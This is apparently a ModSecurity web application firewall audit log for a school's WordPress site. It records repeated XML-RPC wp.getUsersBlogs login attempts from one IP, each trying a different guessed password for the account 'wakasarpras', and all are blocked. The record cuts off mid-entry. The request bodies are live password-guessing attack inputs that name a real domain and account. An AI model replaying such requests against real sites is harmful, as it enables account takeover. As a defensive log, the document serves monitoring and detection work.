[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (32+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745073844952605 4696 (- - -) Stopwatch2: 1745073844952605 4696; combined=3552, p1=422, p2=2963, p3=0, p4=0, p5=100, sr=81, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9f9d1a62-Z-- --30561d16-A-- [19/Apr/2025:21:45:04 +0700] aAO28OvDiFC_ir7MDwYN6QAAAFQ 103.236.140.4 58070 103.236.140.4 8181 --30561d16-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --30561d16-C-- wp.getUsersBlogs wakasarpras peaches --30561d16-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --30561d16-E-- --30561d16-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (23+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745073904285610 4158 (- - -) Stopwatch2: 1745073904285610 4158; combined=2791, p1=369, p2=2268, p3=0, p4=0, p5=89, sr=67, sw=65, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --30561d16-Z-- --c1719f63-A-- [19/Apr/2025:21:46:05 +0700] aAO3LQ6cTFSgLAHl7PoFQAAAAAo 103.236.140.4 35990 103.236.140.4 8181 --c1719f63-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --c1719f63-C-- wp.getUsersBlogs wakasarpras 212121 --c1719f63-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c1719f63-E-- --c1719f63-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (29+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745073965359744 3880 (- - -) Stopwatch2: 1745073965359744 3880; combined=2894, p1=394, p2=2356, p3=0, p4=0, p5=86, sr=70, sw=58, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c1719f63-Z-- --1bcc0a39-A-- [19/Apr/2025:21:47:06 +0700] aAO3anNa4dA2HllpK_OlNQAAAI8 103.236.140.4 41794 103.236.140.4 8181 --1bcc0a39-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --1bcc0a39-C-- wp.getUsersBlogs wakasarpras muffin --1bcc0a39-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1bcc0a39-E-- --1bcc0a39-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (16+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745074026072329 5177 (- - -) Stopwatch2: 1745074026072329 5177; combined=3576, p1=470, p2=2938, p3=0, p4=0, p5=100, sr=88, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1bcc0a39-Z-- --7bce4c0d-A-- [19/Apr/2025:21:48:06 +0700] aAO3pkruoUXZj665VUEojQAAAMw 103.236.140.4 47496 103.236.140.4 8181 --7bce4c0d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --7bce4c0d-C-- wp.getUsersBlogs wakasarpras madison1 --7bce4c0d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7bce4c0d-E-- --7bce4c0d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (33+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745074086325193 5499 (- - -) Stopwatch2: 1745074086325193 5499; combined=4142, p1=519, p2=3438, p3=0, p4=0, p5=111, sr=95, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7bce4c0d-Z-- --6b9ee41a-A-- [19/Apr/2025:21:49:06 +0700] aAO34kruoUXZj665VUEpggAAAM0 103.236.140.4 52990 103.236.140.4 8181 --6b9ee41a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 230 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --6b9ee41a-C-- wp.getUsersBlogs wakasarpras marketing2024 --6b9ee41a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6b9ee41a-E-- --6b9ee41a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (29+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745074146310653 5990 (- - -) Stopwatch2: 1745074146310653 5990; combined=4368, p1=481, p2=3551, p3=0, p4=0, p5=183, sr=89, sw=153, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6b9ee41a-Z-- --fcde1a18-A-- [19/Apr/2025:21:50:10 +0700] aAO4Ig6cTFSgLAHl7PoLMgAAAAA 103.236.140.4 59576 103.236.140.4 8181 --fcde1a18-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --fcde1a18-C-- wp.getUsersBlogs wakasarpras tiffany --fcde1a18-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fcde1a18-E-- --fcde1a18-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (29+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745074210909457 5285 (- - -) Stopwatch2: 1745074210909457 5285; combined=3821, p1=478, p2=3154, p3=0, p4=0, p5=112, sr=95, sw=77, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fcde1a18-Z-- --f1c9b05c-A-- [19/Apr/2025:21:51:12 +0700] aAO4YEruoUXZj665VUEtrAAAAMY 103.236.140.4 37582 103.236.140.4 8181 --f1c9b05c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 240 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --f1c9b05c-C-- wp.getUsersBlogs wakasarpras smkn22-jkt_sch_id123456 --f1c9b05c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f1c9b05c-E-- --f1c9b05c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (31+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745074272360944 4767 (- - -) Stopwatch2: 1745074272360944 4767; combined=3485, p1=430, p2=2884, p3=0, p4=0, p5=100, sr=81, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f1c9b05c-Z-- --09f73e23-A-- [19/Apr/2025:21:52:16 +0700] aAO4oEruoUXZj665VUEv2gAAANE 103.236.140.4 44006 103.236.140.4 8181 --09f73e23-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --09f73e23-C-- wp.getUsersBlogs wakasarpras QWERT --09f73e23-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --09f73e23-E-- --09f73e23-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (29+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745074336199691 4971 (- - -) Stopwatch2: 1745074336199691 4971; combined=3485, p1=446, p2=2876, p3=0, p4=0, p5=95, sr=90, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --09f73e23-Z-- --45c3691c-A-- [19/Apr/2025:21:53:16 +0700] aAO43EruoUXZj665VUExfAAAANI 103.236.140.4 50096 103.236.140.4 8181 --45c3691c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --45c3691c-C-- wp.getUsersBlogs wakasarpras Webadmin --45c3691c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --45c3691c-E-- --45c3691c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (16+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745074396223366 5876 (- - -) Stopwatch2: 1745074396223366 5876; combined=4403, p1=501, p2=3716, p3=0, p4=0, p5=109, sr=89, sw=77, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --45c3691c-Z-- --0f21c630-A-- [19/Apr/2025:21:54:17 +0700] aAO5GevDiFC_ir7MDwYbvQAAAEM 103.236.140.4 56340 103.236.140.4 8181 --0f21c630-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --0f21c630-C-- wp.getUsersBlogs wakasarpras aaa --0f21c630-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0f21c630-E-- --0f21c630-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (27+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745074457936825 5275 (- - -) Stopwatch2: 1745074457936825 5275; combined=4127, p1=500, p2=3438, p3=0, p4=0, p5=112, sr=91, sw=77, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0f21c630-Z-- --81324803-A-- [19/Apr/2025:21:55:17 +0700] aAO5VevDiFC_ir7MDwYdYAAAAEc 103.236.140.4 34106 103.236.140.4 8181 --81324803-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --81324803-C-- wp.getUsersBlogs wakasarpras !null! --81324803-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --81324803-E-- --81324803-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (36+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745074517983489 6316 (- - -) Stopwatch2: 1745074517983489 6316; combined=4926, p1=464, p2=4228, p3=0, p4=0, p5=139, sr=84, sw=95, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --81324803-Z-- --6c5db504-A-- [19/Apr/2025:21:56:17 +0700] aAO5kevDiFC_ir7MDwYeiQAAAE4 103.236.140.4 40352 103.236.140.4 8181 --6c5db504-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --6c5db504-C-- wp.getUsersBlogs wakasarpras t0rchw00d --6c5db504-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6c5db504-E-- --6c5db504-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (39+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745074577938243 8092 (- - -) Stopwatch2: 1745074577938243 8092; combined=4813, p1=893, p2=3776, p3=0, p4=0, p5=86, sr=92, sw=58, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6c5db504-Z-- --cc0af025-A-- [19/Apr/2025:21:57:17 +0700] aAO5zXNa4dA2HllpK_O0oAAAAJI 103.236.140.4 46494 103.236.140.4 8181 --cc0af025-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --cc0af025-C-- wp.getUsersBlogs wakasarpras coffee --cc0af025-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cc0af025-E-- --cc0af025-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (23+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745074637482050 5583 (- - -) Stopwatch2: 1745074637482050 5583; combined=4096, p1=511, p2=3378, p3=0, p4=0, p5=126, sr=89, sw=81, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cc0af025-Z-- --56d7ca14-A-- [19/Apr/2025:21:58:17 +0700] aAO6CUruoUXZj665VUE5nwAAANc 103.236.140.4 52778 103.236.140.4 8181 --56d7ca14-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --56d7ca14-C-- wp.getUsersBlogs wakasarpras qweewq --56d7ca14-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --56d7ca14-E-- --56d7ca14-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (29+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745074697887395 5613 (- - -) Stopwatch2: 1745074697887395 5613; combined=3891, p1=478, p2=3201, p3=0, p4=0, p5=131, sr=91, sw=81, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --56d7ca14-Z-- --9354a21a-A-- [19/Apr/2025:21:59:19 +0700] aAO6R-vDiFC_ir7MDwYi-AAAAEs 103.236.140.4 59042 103.236.140.4 8181 --9354a21a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --9354a21a-C-- wp.getUsersBlogs wakasarpras zzzz --9354a21a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9354a21a-E-- --9354a21a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (39+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745074759157263 4951 (- - -) Stopwatch2: 1745074759157263 4951; combined=3510, p1=430, p2=2913, p3=0, p4=0, p5=97, sr=82, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9354a21a-Z-- --a9317d65-A-- [19/Apr/2025:22:00:19 +0700] aAO6gw6cTFSgLAHl7PoZYwAAABU 103.236.140.4 36912 103.236.140.4 8181 --a9317d65-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id 